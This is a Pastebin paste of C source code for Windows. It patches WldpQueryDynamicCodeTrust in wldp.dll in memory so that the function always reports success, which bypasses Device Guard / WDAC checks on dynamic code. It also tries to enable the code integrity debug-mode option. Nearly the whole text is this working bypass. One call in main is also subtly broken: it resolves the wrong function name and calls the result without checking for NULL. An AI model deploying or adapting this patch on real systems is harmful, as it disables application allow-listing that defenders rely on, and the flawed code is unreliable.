Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /**
- BSD 3-Clause License
- Copyright (c) 2019 Odzhan. All rights reserved.
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions are met:
- * Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
- * Neither the name of the copyright holder nor the names of its
- contributors may be used to endorse or promote products derived from
- this software without specific prior written permission.
- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
- AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
- DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
- FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
- CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
- OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
- OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- */
- #include <windows.h>
- #include <wldp.h>
- #include <stdio.h>
- typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
- PBOOL isEnabled);
- typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
- HANDLE fileHandle,
- PVOID baseImage,
- ULONG ImageSize);
- // fake function that always returns S_OK
- static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
- HANDLE fileHandle,
- PVOID baseImage,
- ULONG ImageSize)
- {
- return S_OK;
- }
- static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}
- static BOOL PatchWldp(VOID) {
- BOOL patched = FALSE;
- HMODULE wldp;
- DWORD len, op, t;
- LPVOID cs;
- // load wldp
- wldp = LoadLibrary("wldp");
- if(wldp != NULL) {
- // resolve address of function to patch
- cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
- if(cs != NULL) {
- // calculate length of stub
- len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
- (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
- // make the memory writeable
- if(VirtualProtect(
- cs, len, PAGE_EXECUTE_READWRITE, &op))
- {
- // over write with stub
- memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
- patched = TRUE;
- // set back to original protection
- VirtualProtect(cs, len, op, &t);
- }
- }
- }
- return patched;
- }
- BOOL VerifyCodeTrust(const char *path) {
- WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
- HMODULE wldp;
- HANDLE file, map, mem;
- HRESULT hr = -1;
- DWORD low, high;
- // load wldp
- wldp = LoadLibrary("wldp");
- _WldpQueryDynamicCodeTrust =
- (WldpQueryDynamicCodeTrust_t)
- GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
- // return FALSE on failure
- if(_WldpQueryDynamicCodeTrust == NULL) {
- printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
- return FALSE;
- }
- // open file reading
- file = CreateFile(
- path, GENERIC_READ, FILE_SHARE_READ,
- NULL, OPEN_EXISTING,
- FILE_ATTRIBUTE_NORMAL, NULL);
- if(file != INVALID_HANDLE_VALUE) {
- // get size
- low = GetFileSize(file, &high);
- if(low != 0) {
- // create mapping
- map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
- if(map != NULL) {
- // get pointer to memory
- mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
- if(mem != NULL) {
- // verify signature
- hr = _WldpQueryDynamicCodeTrust(0, mem, low);
- UnmapViewOfFile(mem);
- }
- CloseHandle(map);
- }
- }
- CloseHandle(file);
- }
- return hr == S_OK;
- }
- #include "C:\ntlib\ntddk.h"
- #define SystemCodeIntegrityInformation 0x67
- #define CODEINTEGRITY_OPTION_ENABLED 0x0001
- #define CODEINTEGRITY_OPTION_TESTSIGN 0x0002
- #define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x0004
- #define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x0008
- #define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x0010
- #define CODEINTEGRITY_OPTION_TEST_BUILD 0x0020
- #define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x0040
- #define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x0080
- #define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x0100
- #define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x0200
- #define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x0400
- #define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x0800
- #define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
- #define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
- typedef struct _ci_opt {
- ULONG ulOption;
- PCHAR szOption;
- } ci_opt;
- ci_opt options[]={
- {CODEINTEGRITY_OPTION_ENABLED,"CODEINTEGRITY_OPTION_ENABLED"},
- {CODEINTEGRITY_OPTION_TESTSIGN,"CODEINTEGRITY_OPTION_TESTSIGN"},
- {CODEINTEGRITY_OPTION_UMCI_ENABLED,"CODEINTEGRITY_OPTION_UMCI_ENABLED"},
- {CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED"},
- {CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED,"CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED"},
- {CODEINTEGRITY_OPTION_TEST_BUILD,"CODEINTEGRITY_OPTION_TEST_BUILD"},
- {CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD,"CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD"},
- {CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED,"CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED"},
- {CODEINTEGRITY_OPTION_FLIGHT_BUILD,"CODEINTEGRITY_OPTION_FLIGHT_BUILD"},
- {CODEINTEGRITY_OPTION_FLIGHTING_ENABLED,"CODEINTEGRITY_OPTION_FLIGHTING_ENABLED"},
- {CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED"},
- {CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED"},
- {CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED"},
- {CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED,"CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED"},
- {0, NULL}
- };
- typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
- ULONG Length;
- ULONG CodeIntegrityOptions;
- } SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
- VOID ListCIOptions(VOID) {
- NTSTATUS status;
- SYSTEM_CODEINTEGRITY_INFORMATION scii;
- DWORD i, len;
- scii.Length = sizeof(scii);
- status = NtQuerySystemInformation(
- SystemCodeIntegrityInformation,
- &scii, sizeof(scii), &len);
- if(NT_SUCCESS(status)) {
- printf("\nCode Integrity Options.\n\n");
- for(i=0;options[i].ulOption != 0; i++) {
- if(scii.CodeIntegrityOptions & options[i].ulOption) {
- printf("%s\n", options[i].szOption);
- }
- }
- }
- }
- // Trying to set the code integrity options will return STATUS_INVALID_INFO_CLASS
- BOOL EnableCIOption(ULONG Option) {
- NTSTATUS status;
- SYSTEM_CODEINTEGRITY_INFORMATION scii;
- DWORD i, len;
- scii.Length = sizeof(scii);
- status = NtQuerySystemInformation(
- SystemCodeIntegrityInformation,
- &scii, sizeof(scii), &len);
- if(NT_SUCCESS(status)) {
- scii.CodeIntegrityOptions |= CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED;
- status = NtSetSystemInformation(
- SystemCodeIntegrityInformation,
- &scii, sizeof(scii), &len);
- printf("status is %08lx\n", status);
- }
- return NT_SUCCESS(status);
- }
- int main(int argc, char *argv[]) {
- int i;
- WldpIsDynamicCodePolicyEnabled_t WldpIsDynamicCodePolicyEnabled;
- BOOL enabled;
- EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);
- ListCIOptions();
- WldpIsDynamicCodePolicyEnabled =
- (WldpIsDynamicCodePolicyEnabled_t)
- GetProcAddress(LoadLibrary("wldp"), "WldpQueryDynamicCodeTrust");
- if(WldpIsDynamicCodePolicyEnabled == NULL) {
- printf("unable to load Wldp.\n");
- }
- WldpIsDynamicCodePolicyEnabled(&enabled);
- printf("Wldp Code Policy is %s.\n",
- enabled ? "enabled" : "disabled");
- if(!PatchWldp()) {
- printf("unable to patch Wldp.\n");
- return 0;
- }
- for(i=1; i<argc; i++) {
- // skip directories
- if(GetFileAttributes(argv[i]) & FILE_ATTRIBUTE_DIRECTORY) continue;
- // verify file
- printf("%-8s : %s\n",
- VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
- argv[i]);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement